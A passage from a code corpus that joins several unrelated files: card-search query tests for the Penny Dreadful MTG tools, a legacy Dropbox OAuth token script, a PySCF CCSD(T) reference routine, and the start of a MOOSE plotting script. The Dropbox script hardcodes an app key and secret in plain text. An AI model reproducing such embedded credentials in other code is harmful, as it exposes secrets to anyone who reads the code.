    do_functional_test(s, ["Kolaghan's Command", 'Sliver Queen'], ['Cat Dragon', 'Badlands'])
    s = 'is:permanent t:rebel'
    do_functional_test(s, ['Aven Riftwatcher', 'Bound in Silence'], ['Brutal Suppression', 'Mirror Entity'])
    s = 'is:vanilla'
    do_functional_test(s, ['Grizzly Bears', 'Isamaru, Hound of Konda'], ['Giant Spider', 'Lightning Bolt', 'Tarmogoyf'])
# … Extra Cards and Funny Cards …
@pytest.mark.functional
def test_rarity() -> None:
    """Rarity filters (r:) with equality and comparison operators."""
    s = 'r:common t:artifact'
    do_functional_test(s, ['Court Homunculus', 'Prophetic Prism', "Tormod's Crypt"], ['Lightning Bolt', 'Master of Etherium'])
    s = 'r>=r'
    do_functional_test(s, ['Black Lotus', "Elspeth, Sun's Champion", 'Lotus Cobra'], ['Abbey Griffin', 'Tattermunge Maniac'])
    # We don't currently support `new:rarity`
    # s = 'rarity:common e:ima new:rarity'
    # do_functional_test(s, ['Darksteel Axe', 'Seeker of the Way'], ['Balustrade Spy', 'Bladewing the Risen'])
@pytest.mark.functional
def test_sets_and_blocks() -> None:
    """Edition filter (e:); block/booster/printing filters are not yet
    supported and remain commented out."""
    s = 'e:war'
    do_functional_test(s, ['Blast Zone', 'Finale of Devastation', 'Tezzeret, Master of the Bridge'], ['Lightning Helix', 'Wastes'])
    # s = 'e:war is:booster'
    # do_functional_test(s, ['Blast Zone', 'Finale of Devastation'], ['Lightning Helix', 'Tezzeret, Master of the Bridge', 'Wastes'])
    # s = 'b:wwk'
    # do_functional_test(s, ['Inquisition of Kozilek', 'Jace, the Mind Sculptor', 'Misty Rainforest', 'Stoneforge Mystic'], [])
    # s = 'in:lea in:m15'
    # do_functional_test(s, ['Plains', 'Shivan Dragon'], ['Ancestral Recall', 'Chord of Calling', 'Lightning Bolt'])
    # s = 't:legendary -in:booster'
    # do_functional_test(s, ['Animatou, the Fateshifter', 'Korvold, Fae-Cursed King'], ['Retrofitter Foundry', 'Swamp', 'Wrenn and Six'])
    # s = 'is:datestamped is:prerelease'
    # do_functional_test(s, ['Mox Amber', 'Ulamog, the Ceaseless Hunger'], ['Mayor of Avabruck', 'Valakut, the Molten Pinnacle'])
# … Cubes …
@pytest.mark.functional
def test_format_legality() -> None:
s = 'c:g t:creature f:pauper'
do_functional_test(s, ['Nettle Sentinel', 'Rhox Brute', 'Slippery Bogle'], ['Ninja of the Deep Hours', 'Noble Hierarch', 'Utopia Sprawl'])
# s = 'banned:legacy'
# do_functional_test(s, ['Flash', 'Frantic Search', 'Mox Jet', 'Necropotence'], ['Delver of Secrets', 'Force of Will'])
s = 'is:commander'
do_functional_test(s, ['Progenitus', 'Teferi, Temporal Archmage'], ['Forest', 'Nettle Sentinel', 'Rofellos, Llanowar Emissary'])
# s = 'is:reserved'
# do_functional_test(s, [], [])
# USD/EUR/TIX prices
# Artist, Flavor Text and Watermark
# Border, Frame, Foil and Resolution
# Games, Promos and Spotlights
# Year
# Tagger tags
# Reprints
# Languages
# Shortcuts and Nicknames
@pytest.mark.functional
def test_negating_conditions() -> None:
s = '-fire c:r t:instant'
do_functional_test(s, [], [])
s = 'o:changeling -t:creature'
do_functional_test(s, [], [])
s = 'not:reprint e:c16'
do_functional_test(s, [], [])
# Regular Expressions
# Exact Names
@pytest.mark.functional
def test_using_or() -> None:
s = 't:fish or t:bird'
do_functional_test(s, [], [])
s = 't:land (a:titus or a:avon)'
do_functional_test(s, [], [])
@pytest.mark.functional
def test_nesting_conditions() -> None:
s = 't:legenday (t:goblin or t:elf)'
do_functional_test(s, [], [])
s = 'through (depths or sands or mists)'
do_functional_test(s, ['Peer Through Depths', 'Reach Through Mists', 'Sift Through Sands'], ['Dig Through Time', 'Through the Breach'])
# Display Keywords
# END Tests from https://scryfall.com/docs/syntax
@pytest.mark.functional
def test_edition_functional() -> None:
    do_functional_test('e:ktk', ['Flooded Strand', 'Treasure Cruise', 'Zurgo Helmsmasher'], ['Life from the Loam', 'Scalding Tarn', 'Zurgo Bellstriker'])

def test_edition() -> None:
    # Non-functional tests check the generated SQL WHERE clause only.
    do_test('e:ktk', "(c.id IN (SELECT card_id FROM printing WHERE set_id IN (SELECT id FROM `set` WHERE name = 'ktk' OR code = 'ktk')))")

def test_special_chars() -> None:
    # SQL LIKE metacharacters (_ and %) in a query must be escaped.
    do_test('o:a_c%', "(oracle_text LIKE '%%a\\_c\\%%%%')")

@pytest.mark.functional
def test_tilde_functional() -> None:
    do_functional_test('o:"sacrifice ~"', ['Abandoned Outpost', 'Black Lotus'], ['Cartel Aristocrat', 'Life from the Loam'])

def test_tilde() -> None:
    # '~' in oracle text stands for the card's own name.
    expected = "(oracle_text LIKE CONCAT('%%sacrifice ', name, '%%'))"
    do_test('o:"sacrifice ~"', expected)

@pytest.mark.functional
def test_double_tilde_functional() -> None:
    do_functional_test('o:"sacrifice ~: ~ deals 2 damage to any target"', ['Blazing Torch', 'Inferno Fist'], ['Black Lotus', 'Cartel Aristocrat'])

def test_double_tilde() -> None:
    # Every occurrence of '~' is replaced, not just the first.
    expected = "(oracle_text LIKE CONCAT('%%sacrifice ', name, ': ', name, ' deals 2 damage to any target%%'))"
    do_test('o:"sacrifice ~: ~ deals 2 damage to any target"', expected)
@pytest.mark.functional
def test_color() -> None:
    do_functional_test('c<=w t:creature', ['Icehide Golem', 'Thalia, Guardian of Thraben'], ['Delver of Secrets', 'Duskwatch Recruiter', 'Enlightened Tutor', 'Mantis Rider'])

@pytest.mark.functional
def test_only_multicolored_functional() -> None:
    do_functional_test('c:m', ['Bant Charm', 'Murderous Redcap'], ['Door to Nothingness', 'Fires of Undeath', 'Lightning Bolt'])

def test_only_multicolored() -> None:
    do_test('c:m', '(c.id IN (SELECT card_id FROM card_color GROUP BY card_id HAVING COUNT(card_id) >= 2))')

def test_multicolored_with_other_colors() -> None:
    # 'm' (multicolored) cannot be combined with a specific color.
    found = False
    try:
        do_test('c:bm', '')
    except InvalidValueException:
        found = True
    assert found

@pytest.mark.functional
def test_multicolored_coloridentity_functional() -> None:
    do_functional_test('ci>=b', ['Dark Ritual', 'Golos, Tireless Pilgrim', 'Murderous Redcap', 'Swamp'], ['Black Lotus', 'Daze', 'Plains'])

def test_multicolored_coloridentity() -> None:
    do_test('ci>=b', '((c.id IN (SELECT card_id FROM card_color_identity WHERE color_id = 3)))')

@pytest.mark.functional
def test_exclusivemulitcolored_same_functional() -> None:
    # NOTE(review): 'Muderous Redcap' looks like a typo for 'Murderous
    # Redcap'; harmless here since the name only has to be absent.
    do_functional_test('ci!b', ['Dark Ritual', 'Swamp'], ['Black Lotus', 'Golos, Tireless Pilgrim', 'Muderous Redcap'])

def test_exclusivemulitcolored_same() -> None:
    do_test('ci!b', '((c.id IN (SELECT card_id FROM card_color_identity WHERE color_id = 3))) AND (c.id IN (SELECT card_id FROM card_color_identity GROUP BY card_id HAVING COUNT(card_id) <= 1))')

def test_mulitcolored_multiple() -> None:
    do_test('c=br', '((c.id IN (SELECT card_id FROM card_color WHERE color_id = 3))) AND ((c.id IN (SELECT card_id FROM card_color WHERE color_id = 4))) AND (c.id IN (SELECT card_id FROM card_color GROUP BY card_id HAVING COUNT(card_id) <= 2))')

@pytest.mark.functional
def test_multicolored_exclusive_functional() -> None:
    do_functional_test('c!br', ["Kroxa, Titan of Death's Hunger", 'Fulminator Mage', 'Murderous Redcap'], ['Bosh, Iron Golem', 'Dark Ritual', 'Fires of Undeath'])

def test_multicolored_exclusive() -> None:
    do_test('c!br', '((c.id IN (SELECT card_id FROM card_color WHERE color_id = 3))) AND ((c.id IN (SELECT card_id FROM card_color WHERE color_id = 4))) AND (c.id IN (SELECT card_id FROM card_color GROUP BY card_id HAVING COUNT(card_id) <= 2))')

@pytest.mark.functional
def test_color_identity_functional() -> None:
    # 'ci', 'cid' and 'id' are synonyms.
    yes = ['Brainstorm', 'Force of Will', 'Mystic Sanctuary', 'Venser, Shaper Savant']
    no = ['Electrolyze', 'Swamp', 'Underground Sea']
    do_functional_test('ci=u', yes, no)
    do_functional_test('cid=u', yes, no)
    do_functional_test('id=u', yes, no)

def test_color_identity() -> None:
    where = '((c.id IN (SELECT card_id FROM card_color_identity WHERE color_id = 2))) AND (c.id IN (SELECT card_id FROM card_color_identity GROUP BY card_id HAVING COUNT(card_id) <= 1))'
    do_test('ci=u', where)
    do_test('cid=u', where)
    do_test('id=u', where)
    do_test('commander=u', where)

@pytest.mark.functional
def test_color_identity_two_colors() -> None:
    do_functional_test('id:uw', ['Brainstorm', 'Dream Trawler', 'Island', 'Wastes'], ['Forbidden Alchemy', 'Lightning Bolt', 'Watery Grave'])

@pytest.mark.functional
def test_color_identity_colorless_functional() -> None:
    do_functional_test('ci:c', ['Lodestone Golem', 'Wastes'], ['Academy Ruins', 'Bosh, Iron Golem', 'Lightning Bolt', 'Plains'])

def test_color_identity_colorless() -> None:
    # Colorless identity = not in any of the five colors and no identity rows.
    do_test('ci:c', '(NOT (c.id IN (SELECT card_id FROM card_color_identity WHERE color_id = 3))) AND (NOT (c.id IN (SELECT card_id FROM card_color_identity WHERE color_id = 5))) AND (NOT (c.id IN (SELECT card_id FROM card_color_identity WHERE color_id = 4))) AND (NOT (c.id IN (SELECT card_id FROM card_color_identity WHERE color_id = 2))) AND (NOT (c.id IN (SELECT card_id FROM card_color_identity WHERE color_id = 1))) AND (c.id NOT IN (SELECT card_id FROM card_color_identity))')

@pytest.mark.functional
def test_color_exclusively_functional() -> None:
    do_functional_test('c!r', ['Gut Shot', 'Lightning Bolt'], ['Bosh, Iron Golem', 'Lightning Helix', 'Mountain', 'Mox Ruby'])

def test_color_exclusively() -> None:
    do_test('c!r', '((c.id IN (SELECT card_id FROM card_color WHERE color_id = 4))) AND (c.id IN (SELECT card_id FROM card_color GROUP BY card_id HAVING COUNT(card_id) <= 1))')

@pytest.mark.functional
def test_color_exclusively2_functional() -> None:
    do_functional_test('c!rg', ['Assault // Battery', 'Destructive Revelry', 'Tattermunge Maniac'], ['Ancient Grudge', 'Lightning Bolt', 'Taiga'])

def test_color_exclusively2() -> None:
    do_test('c!rg', '((c.id IN (SELECT card_id FROM card_color WHERE color_id = 5))) AND ((c.id IN (SELECT card_id FROM card_color WHERE color_id = 4))) AND (c.id IN (SELECT card_id FROM card_color GROUP BY card_id HAVING COUNT(card_id) <= 2))')

def test_colorless_with_color() -> None:
    # 'c' (colorless) cannot be combined with a color.
    found = False
    try:
        do_test('c:cr', '')
    except InvalidValueException:
        found = True
    assert found

def test_colorless_exclusivity() -> None:
    do_test('c!c', '(c.id NOT IN (SELECT card_id FROM card_color))')

def test_colorless_exclusivity2() -> None:
    found = False
    try:
        do_test('c!cr', '')
    except InvalidValueException:
        found = True
    assert found

@pytest.mark.functional
def test_multiple_colors_functional() -> None:
    do_functional_test('c:rgw', ['Naya Charm', 'Progenitus', 'Reaper King', 'Transguild Courier'], ["Atarka's Command", 'Jegantha, the Wellspring'])

def test_multiple_colors() -> None:
    do_test('c:rgw', '((c.id IN (SELECT card_id FROM card_color WHERE color_id = 5))) AND ((c.id IN (SELECT card_id FROM card_color WHERE color_id = 4))) AND ((c.id IN (SELECT card_id FROM card_color WHERE color_id = 1)))')
# Mana-cost tests: 'mana=' builds an exact-match clause, 'mana:' a
# substring (LIKE) clause; symbols are normalised into {X}{2/W}... form.
def test_mana() -> None:
    do_test('mana=2WW', "(mana_cost = '{2}{W}{W}')")

def test_mana2() -> None:
    do_test('mana=X2/W2/WRB', "(mana_cost = '{X}{2/W}{2/W}{R}{B}')")

def test_mana3() -> None:
    do_test('mana=XRB', "(mana_cost = '{X}{R}{B}')")

def test_mana4() -> None:
    do_test('mana=15', "(mana_cost = '{15}')")

def test_mana5() -> None:
    do_test('mana=U/P', "(mana_cost = '{U/P}')")

def test_mana6() -> None:
    do_test('mana:c', "(mana_cost LIKE '%%{C}%%')")

def test_mana7() -> None:
    do_test('mana:uu', "(mana_cost LIKE '%%{U}{U}%%')")

def test_mana8() -> None:
    do_test('mana:g/u/p', "(mana_cost LIKE '%%{G/U/P}%%')")

@pytest.mark.functional
def test_hybrid_phyrexian_mana() -> None:
    do_functional_test('mana:g/u/p', ['Tamiyo, Compleated Sage'], ['Corrosive Gale', 'Gitaxian Probe'])

# https://github.com/PennyDreadfulMTG/Penny-Dreadful-Tools/issues/8975
# def test_mana8() -> None:
#     assert search.parse(search.tokenize('mana=2ww')) == search.parse(search.tokenize('mana=ww2'))

def test_uppercase() -> None:
    # Search keys are case-insensitive ('F:' behaves like 'f:').
    pd_id = db().value('SELECT id FROM format WHERE name LIKE %s', ['{term}%%'.format(term=seasons.current_season_name())])
    do_test('F:pd', "(c.id IN (SELECT card_id FROM card_legality WHERE format_id = {pd_id} AND legality <> 'Banned'))".format(pd_id=pd_id))

def test_subtype() -> None:
    do_test('subtype:warrior', "(c.id IN (SELECT card_id FROM card_subtype WHERE subtype LIKE '%%warrior%%'))")
def test_not() -> None:
    do_test('t:creature -t:artifact t:legendary', "(type_line LIKE '%%creature%%') AND NOT (type_line LIKE '%%artifact%%') AND (type_line LIKE '%%legendary%%')")

def test_not_cmc() -> None:
    do_test('-cmc=2', 'NOT (cmc IS NOT NULL AND cmc = 2)')

def test_cmc() -> None:
    do_test('cmc>2', '(cmc IS NOT NULL AND cmc > 2)')
    do_test('cmc=0', '(cmc IS NOT NULL AND cmc = 0)')

def test_not_text() -> None:
    # '-' and 'NOT' are interchangeable negation forms.
    do_test('o:haste -o:deathtouch o:trample NOT o:"first strike" o:lifelink', "(oracle_text LIKE '%%haste%%') AND NOT (oracle_text LIKE '%%deathtouch%%') AND (oracle_text LIKE '%%trample%%') AND NOT (oracle_text LIKE '%%first strike%%') AND (oracle_text LIKE '%%lifelink%%')")

@pytest.mark.functional
def test_color_not_text_functional() -> None:
    do_functional_test('c:b -c:r o:trample', ['Abyssal Persecutor', 'Driven // Despair'], ['Child of Alara', 'Chromanticore'])

def test_color_not_text() -> None:
    do_test('c:b -c:r o:trample', "((c.id IN (SELECT card_id FROM card_color WHERE color_id = 3))) AND NOT ((c.id IN (SELECT card_id FROM card_color WHERE color_id = 4))) AND (oracle_text LIKE '%%trample%%')")

@pytest.mark.functional
def test_color_functional() -> None:
    do_functional_test('c:g', ['Destructive Revelry', 'Rofellos, Llanowar Emissary', 'Tattermunge Maniac'], ['Ancient Grudge', 'Forest', 'Lightning Bolt'])

def test_color_green() -> None:
    do_test('c:g', '((c.id IN (SELECT card_id FROM card_color WHERE color_id = 5)))')

def test_or() -> None:
    do_test('a OR b', "(name LIKE '%%a%%') OR (name LIKE '%%b%%')")

def test_bad_or() -> None:
    # 'orgg' contains 'or' but must be treated as a plain name search.
    do_test('orgg', "(name LIKE '%%orgg%%')")

def test_or_without_args() -> None:
    # NOTE(review): if no exception is raised this falls through to the
    # normal do_test comparison, so the test passes either way by design.
    try:
        do_test('or GG', "(name LIKE '%%or gg%%')")
    except search.InvalidSearchException:
        pass

def test_not_without_args() -> None:
    # The expected string is unreachable: either the parse raises, or the
    # assertion inside do_test fails with this message.
    try:
        do_test('c:r NOT', 'Expected InvalidSearchException')
    except search.InvalidSearchException:
        pass

def test_or_with_args() -> None:
    do_test('AA or GG', "(name LIKE '%%aa%%') OR (name LIKE '%%gg%%')")

def test_text() -> None:
    # 'o:' and 'fulloracle:' both search oracle text.
    do_test('o:"target attacking"', "(oracle_text LIKE '%%target attacking%%')")
    do_test('fulloracle:"target attacking"', "(oracle_text LIKE '%%target attacking%%')")

def test_name() -> None:
    do_test('tension turtle', "(name LIKE '%%tension%%') AND (name LIKE '%%turtle%%')")

def test_parentheses() -> None:
    do_test('x OR (a OR (b AND c))', "(name LIKE '%%x%%') OR ((name LIKE '%%a%%') OR ((name LIKE '%%b%%') AND (name LIKE '%%c%%')))")

@pytest.mark.functional
def test_toughness_functional() -> None:
    do_functional_test('c:r tou>2', ['Bonecrusher Giant', "Kroxa, Titan of Death's Hunger"], ['Endurance', 'Ragavan, Nimble Pilferer', 'Wurmcoil Engine'])

def test_toughness() -> None:
    do_test('c:r tou>2', '((c.id IN (SELECT card_id FROM card_color WHERE color_id = 4))) AND (toughness IS NOT NULL AND toughness > 2)')

def test_type() -> None:
    do_test('t:"human wizard"', "(type_line LIKE '%%human wizard%%')")

def test_power() -> None:
    do_test('t:wizard pow<2', "(type_line LIKE '%%wizard%%') AND (power IS NOT NULL AND power < 2)")

def test_mana_with_other() -> None:
    do_test('t:creature mana=WW o:lifelink', "(type_line LIKE '%%creature%%') AND (mana_cost = '{W}{W}') AND (oracle_text LIKE '%%lifelink%%')")

def test_mana_alone() -> None:
    do_test('mana=2uu', "(mana_cost = '{2}{U}{U}')")

def test_or_and_parentheses() -> None:
    do_test('o:"target attacking" OR (mana=2uu AND (tou>2 OR pow>2))', "(oracle_text LIKE '%%target attacking%%') OR ((mana_cost = '{2}{U}{U}') AND ((toughness IS NOT NULL AND toughness > 2) OR (power IS NOT NULL AND power > 2)))")

@pytest.mark.functional
def test_not_color_functional() -> None:
    do_functional_test('c:r -c:u', ['Lightning Bolt', 'Lightning Helix'], ['Bosh, Iron Golem', 'Electrolyze'])

def test_not_color() -> None:
    do_test('c:r -c:u', '((c.id IN (SELECT card_id FROM card_color WHERE color_id = 4))) AND NOT ((c.id IN (SELECT card_id FROM card_color WHERE color_id = 2)))')

@pytest.mark.functional
def test_complex_functional() -> None:
    do_functional_test('c:u OR (c:g tou>3)', ['Dragonlord Atarka', 'Endurance', 'Force of Negation', 'Teferi, Time Raveler', 'Venser, Shaper Savant'], ['Acidic Slime', 'Black Lotus', 'Giant Growth', 'Lightning Bolt', 'Wrenn and Six'])

def test_complex() -> None:
    do_test('c:u OR (c:g tou>3)', '((c.id IN (SELECT card_id FROM card_color WHERE color_id = 2))) OR (((c.id IN (SELECT card_id FROM card_color WHERE color_id = 5))) AND (toughness IS NOT NULL AND toughness > 3))')

def test_is_hybrid() -> None:
    do_test('is:hybrid', "((mana_cost LIKE '%%/2%%') OR (mana_cost LIKE '%%/W%%') OR (mana_cost LIKE '%%/U%%') OR (mana_cost LIKE '%%/B%%') OR (mana_cost LIKE '%%/R%%') OR (mana_cost LIKE '%%/G%%'))")

def test_is_commander() -> None:
    do_test('is:commander', "((type_line LIKE '%%legendary%%') AND ((type_line LIKE '%%creature%%') OR (oracle_text LIKE CONCAT('%%', name, ' can be your commander%%'))) AND (c.id IN (SELECT card_id FROM card_legality WHERE format_id = 4 AND legality <> 'Banned')))")

@pytest.mark.functional
def test_format_functional() -> None:
    # 'f:', 'format:' and 'legal:' are synonyms; '-' inverts legality.
    legal = ['Plains']
    not_legal = ['Black Lotus']
    do_functional_test('f:penny', legal, not_legal)
    do_functional_test('f:pd', legal, not_legal)
    do_functional_test('-f:penny', not_legal, legal)
    do_functional_test('-f:pd', not_legal, legal)
    do_functional_test('format:pd', legal, not_legal)
    do_functional_test('legal:pd', legal, not_legal)

@pytest.mark.functional
def test_is_commander_illegal_commander_functional() -> None:
    do_functional_test('c:g cmc=2 is:commander', ['Ayula, Queen Among Bears', 'Gaddock Teeg'], ['Fblthp, the Lost', 'Rofellos, Llanowar Emissary'])

def test_is_spikey() -> None:
    # Spot-check the generated clause, including an escaped apostrophe.
    where = search.parse(search.tokenize('is:spikey'))
    assert 'Attune with Aether' in where
    assert 'Balance' in where
    assert "name = 'Yawgmoth''s Will'" in where
def do_functional_test(query: str, yes: List[str], no: List[str]) -> None:
    """Run `query` against the card database and verify membership.

    Every name in `yes` must appear in the results and every name in
    `no` must be absent.
    """
    found = {card.name for card in search.search(query)}
    for name in yes:
        assert name in found
    for name in no:
        assert name not in found
def do_test(query: str, expected: str) -> None:
    """Assert that `query` compiles to exactly the WHERE clause `expected`."""
    actual = search.parse(search.tokenize(query))
    if actual != expected:
        # Print a readable comparison before the assertion fires.
        print('\nQuery: {query}\nExpected: {expected}\n Actual: {actual}'.format(query=query, expected=expected, actual=actual))
    assert expected == actual
| PennyDreadfulMTG/Penny-Dreadful-Tools | find/find_test.py | Python | gpl-3.0 | 23,978 | [
"Amber",
"BLAST"
] | 66df5a92a5a3951c75dce557c2865aac3896b02062b3caf2923b6910877248e5 |
# Include the Dropbox SDK libraries
# NOTE(review): this uses the legacy Dropbox SDK v1 OAuth 1.0 flow
# (`dropbox.session`); later SDK releases removed this module — confirm the
# pinned `dropbox` package version before running.
from dropbox import session

# Onitu has a unique set of App key and secret to identify it.
ONITU_APP_KEY = "6towoytqygvexx3"
ONITU_APP_SECRET = "90hsd4z4d8eu3pp"
# ACCESS_TYPE should be 'dropbox' or 'app_folder' as configured for your app
ACCESS_TYPE = 'dropbox'

# Start an OAuth session and obtain a request token to be authorized.
sess = session.DropboxSession(ONITU_APP_KEY, ONITU_APP_SECRET, ACCESS_TYPE)
request_token = sess.obtain_request_token()
url = sess.build_authorize_url(request_token)

# Make the user sign in and authorize this token
print("url: {}".format(url))
print("Please visit this website and press the 'Allow' button,"
      " then hit 'Enter' here.")

# Python 2/3 compatibility: wait for Enter with whichever builtin exists.
try:
    raw_input()  # Python 2
except NameError:
    input()  # Python 3

# This will fail if the user didn't visit the above URL
access_token = sess.obtain_access_token(request_token)

# Print the token for future reference
print("Use these keys to fill your setup.yml configuration file:")
print('Access Key:', access_token.key, 'Access Secret:', access_token.secret)
| onitu/onitu | drivers/dropbox/get_access_token.py | Python | mit | 1,017 | [
"VisIt"
] | aa189e37eec31ce5b968c9e970c577f8a1e7327be531ca6fc707deab0aedd629 |
#!/usr/bin/env python
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Qiming Sun <osirpt.sun@gmail.com>
#
'''
GHF-CCSD(T) with spin-orbital integrals
'''
import time
import numpy
from pyscf import lib
from pyscf.lib import logger
from pyscf.cc import gccsd
# spin-orbital formula
# JCP, 98, 8718
def kernel(cc, eris, t1=None, t2=None, max_memory=2000, verbose=logger.INFO):
    '''Compute the (T) perturbative triples correction for GHF-CCSD.

    Args:
        cc: a GCCSD object providing converged t1/t2 amplitudes.
        eris: antisymmetrized spin-orbital integrals (gccsd._PhysicistsERIs).
        t1, t2: optional amplitudes; default to cc.t1 / cc.t2.
        max_memory, verbose: accepted for interface compatibility but not
            used in this slow reference implementation.

    Returns:
        The scalar (T) energy correction.
    '''
    assert(isinstance(eris, gccsd._PhysicistsERIs))
    if t1 is None or t2 is None:
        t1, t2 = cc.t1, cc.t2

    nocc, nvir = t1.shape
    # Integral blocks conjugated/transposed from the stored ov quantities.
    bcei = numpy.asarray(eris.ovvv).conj().transpose(3,2,1,0)
    majk = numpy.asarray(eris.ooov).conj().transpose(2,3,0,1)
    bcjk = numpy.asarray(eris.oovv).conj().transpose(2,3,0,1)
    mo_e = eris.fock.diagonal().real
    eia = mo_e[:nocc,None] - mo_e[nocc:]
    # Triples energy denominator D_ijk^abc built from orbital energy gaps.
    d3 = lib.direct_sum('ia+jb+kc->ijkabc', eia, eia, eia)

    # Connected triples amplitudes, antisymmetrized over (a,b,c) and (i,j,k).
    t3c =(numpy.einsum('jkae,bcei->ijkabc', t2, bcei)
        - numpy.einsum('imbc,majk->ijkabc', t2, majk))
    t3c = t3c - t3c.transpose(0,1,2,4,3,5) - t3c.transpose(0,1,2,5,4,3)
    t3c = t3c - t3c.transpose(1,0,2,3,4,5) - t3c.transpose(2,1,0,3,4,5)
    t3c /= d3

    # Alternative e4+e5 evaluation kept for reference:
    # e4 = numpy.einsum('ijkabc,ijkabc,ijkabc', t3c.conj(), d3, t3c) / 36
    # sia = numpy.einsum('jkbc,ijkabc->ia', eris.oovv, t3c) * .25
    # e5 = numpy.einsum('ia,ia', sia, t1.conj())
    # et = e4 + e5
    # return et

    # Disconnected triples from t1 and the virtual-occupied Fock block.
    t3d = numpy.einsum('ia,bcjk->ijkabc', t1, bcjk)
    t3d += numpy.einsum('ai,jkbc->ijkabc', eris.fock[nocc:,:nocc], t2)
    t3d = t3d - t3d.transpose(0,1,2,4,3,5) - t3d.transpose(0,1,2,5,4,3)
    t3d = t3d - t3d.transpose(1,0,2,3,4,5) - t3d.transpose(2,1,0,3,4,5)
    t3d /= d3

    # 1/36 accounts for the 3! x 3! equivalent index permutations.
    et = numpy.einsum('ijkabc,ijkabc,ijkabc', (t3c+t3d).conj(), d3, t3c) / 36
    return et
if __name__ == '__main__':
    # Self-test: compare this spin-orbital (T) against the RHF-based
    # ccsd_t() result for a slightly distorted water molecule; the printed
    # difference should be ~0.
    from pyscf import gto
    from pyscf import scf
    from pyscf import cc

    mol = gto.Mole()
    mol.atom = [
        [8 , (0. , 0. , 0.)],
        [1 , (0. , -.957 , .587)],
        [1 , (0.2, .757 , .487)]]
    mol.basis = '631g'
    mol.build()
    mf = scf.RHF(mol).run(conv_tol=1e-1)  # deliberately loose SCF convergence
    mycc = cc.CCSD(mf).set(conv_tol=1e-11).run()
    et = mycc.ccsd_t()

    # Repeat in the generalized (spin-orbital) framework.
    mycc = cc.GCCSD(scf.addons.convert_to_ghf(mf)).set(conv_tol=1e-11).run()
    eris = mycc.ao2mo()
    print(kernel(mycc, eris) - et)
| gkc1000/pyscf | pyscf/cc/gccsd_t_slow.py | Python | apache-2.0 | 2,817 | [
"PySCF"
] | f903317330d7725a1274d371ff6f31df0000054635263b6a0f602379475cc8cd |
# Label prefix for the submitted Ganga jobs.
NAME = "Minbias1PV"

# Commented-out helper kept for reference: in-place sed-like file rewrite.
#from tempfile import mkstemp
#from shutil import move
#from os import remove, close
#
#def replace(file_path, pattern, subst):
#    #Create temp file
#    fh, abs_path = mkstemp()
#    with open(abs_path,'w') as new_file:
#        with open(file_path) as old_file:
#            for line in old_file:
#                new_file.write(line.replace(pattern, subst))
#    close(fh)
#    #Remove original file
#    remove(file_path)
#    #Move new file
#    move(abs_path, file_path)

# NOTE(review): this script expects to run inside a Ganga session, which
# provides Job, File, DaVinci, SplitByFiles, BKQuery, DiracFile and Dirac
# as globals — it is not a standalone Python module.
for polarity in ["MagDown"]:
    #script = "/afs/cern.ch/user/s/sstahl/work/analysis/PVscriptMC.py"
    script = "/afs/cern.ch/user/s/sstahl/work/analysis/evt_tuple.py"
    optsfile = [File(script)]
    script_opts = {"YEAR":"2015","POL":polarity}
    # Bookkeeping path for the FULL.DST data of this magnet polarity.
    PATH = "/LHCb/Collision15em/Beam6500GeV-VeloClosed-%(POL)s/Real Data/Reco15em/96000000/FULL.DST/" % script_opts
    j = Job(
        name = NAME + '_%(YEAR)s%(POL)s' %script_opts,
        application = DaVinci(version='v36r7p6',optsfile=optsfile),
        splitter = SplitByFiles(filesPerJob = 25),
        inputdata = BKQuery(path=PATH, dqflag = "All").getDataset(),
        outputfiles = [DiracFile("minbias.root")],
        do_auto_resubmit = True,
        backend = Dirac()
    )
    j.submit()
    #queues.add(j.submit)
| saschastahl/ridge-analysis | scripts/GangaData2015.py | Python | mit | 1,323 | [
"DIRAC"
] | bc0bcd7083081e765293605e6429f8ce26f6d508ffa30cd1c8ac646d84b446de |
#!/usr/bin/env python3
#* This file is part of the MOOSE framework
#* https://www.mooseframework.org
#*
#* All rights reserved, see COPYRIGHT for full restrictions
#* https://github.com/idaholab/moose/blob/master/COPYRIGHT
#*
#* Licensed under LGPL 2.1, please see LICENSE for details
#* https://www.gnu.org/licenses/lgpl-2.1.html
import os
import sys
import numpy as np
import matplotlib.pyplot as plt
def expected(ini, res, ini_x, res_x):
    """Analytic cubic-hardening curve used as the reference solution.

    The curve interpolates from `ini` at `ini_x` to `res` at `res_x` with a
    cubic whose value passes through the midpoint (ini+res)/2.

    Args:
        ini, res: initial and residual values of the hardening parameter.
        ini_x, res_x: internal-parameter values where hardening starts/ends.

    Returns:
        A tuple `(xs, ys)` of two lists with 100 sample points each.
    """
    lo2 = 0.5 * (res_x - ini_x)
    alpha = (ini - res) / 4.0 / lo2**3
    beta = -3.0 * alpha * lo2**2
    xs = [ini_x + i * (res_x - ini_x) / 100 for i in range(100)]
    ys = [alpha * (x - ini_x - lo2)**3 + beta * (x - ini_x - lo2) + (ini + res) / 2.0
          for x in xs]
    # Bug fix: the original returned `zip(*data)`, which on Python 3 is a
    # one-shot iterator; the plotting code indexes the result (expect[0],
    # expect[1]), which raised TypeError.  Return indexable lists instead.
    return (xs, ys)
def moose(fn):
    """Read a MOOSE CSV result file and extract (internal parameter, friction angle).

    Six header lines and one trailing line are skipped; each remaining row is
    a comma-separated list of floats where column 2 is the internal parameter
    and columns 5/7 are the max/min principal stresses.

    Returns:
        (intnl, phi): lists of internal-parameter values and friction angles
        (radians) recovered from the Mohr-Coulomb relation with cohesion 10.
    """
    coh = 10  # cohesion used by the corresponding test input
    # Bug fix: `map(float, ...)` is a lazy iterator on Python 3, so the
    # original `d[2]` indexing raised TypeError; materialise each row.
    # Also close the file deterministically via a context manager.
    with open(fn) as f:
        rows = [list(map(float, line.strip().split(","))) for line in f.readlines()[6:-1]]
    intnl = [row[2] for row in rows]
    # (Smax-Smin)/2, (Smax+Smin)/2
    plus_minus = [(0.5 * (row[5] - row[7]), 0.5 * (row[5] + row[7])) for row in rows]
    phi = [2.0 * np.arctan((np.sqrt(-pm[0]**2 + pm[1]**2 + coh**2) - pm[1]) / (pm[0] + coh))
           for pm in plus_minus]
    return (intnl, phi)
# Plot the analytic hardening curve against the values recovered from the
# MOOSE gold output and write the comparison figure.
plt.figure()
